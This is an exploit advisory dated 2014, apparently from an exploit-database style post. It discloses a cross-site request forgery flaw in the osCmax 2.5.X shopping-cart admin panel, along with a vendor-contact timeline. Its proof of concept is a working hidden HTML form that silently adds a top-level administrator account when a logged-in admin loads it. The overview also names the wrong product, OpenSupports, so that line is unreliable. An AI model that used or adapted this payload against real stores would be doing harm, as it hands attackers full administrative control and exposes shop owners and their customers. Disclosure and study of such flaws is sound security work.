[+] Author: TUNISIAN CYBER [+] Exploit Title: osCmax 2.5.X Cross-Site Request Forgery (Add Admin) Vulnerability [+] Date: 15-03-2014 [+] Category: WebApp [+] Version: 2.5.X [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-302 [+] Vendor: http://www.oscmax.com/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: OpenSupports v2.x suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability. 2.Version: 2.5.X 3.Background: osCmax is a powerful e-commerce/shopping cart web application. osCmax has all the features needed to run a successful internet store and can be customized to whatever configuration you need. http://www.oscmax.com/what_is_oscmax_0 4.Proof Of Concept: <html> <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&amp;page=1&amp;mID=1"> <input type="hidden" name="admin_username" value="THETUNISIAN"/> <input type="hidden" name="admin_firstname" value="Moot3x"/> <input type="hidden" name="admin_lastname" value="Saad3x"/> <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/> <input type="hidden" name="admin_groups_id" value="1"/> <!-- About "admin_groups_id" --> <!-- 1= Top Administrator --> <!-- 2= Customer Service --> <input type='submit' name='Submit4' value="Agregar"> </form> </html> 5.Solution(s): no contact from vendor 6.TIME-LINE: 2014-15-03: Vulnerability was discovered. 2014-15-03: Contact with vendor. 2014-16-03: No reply. 2014-17-03: No reply. 2014-17-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members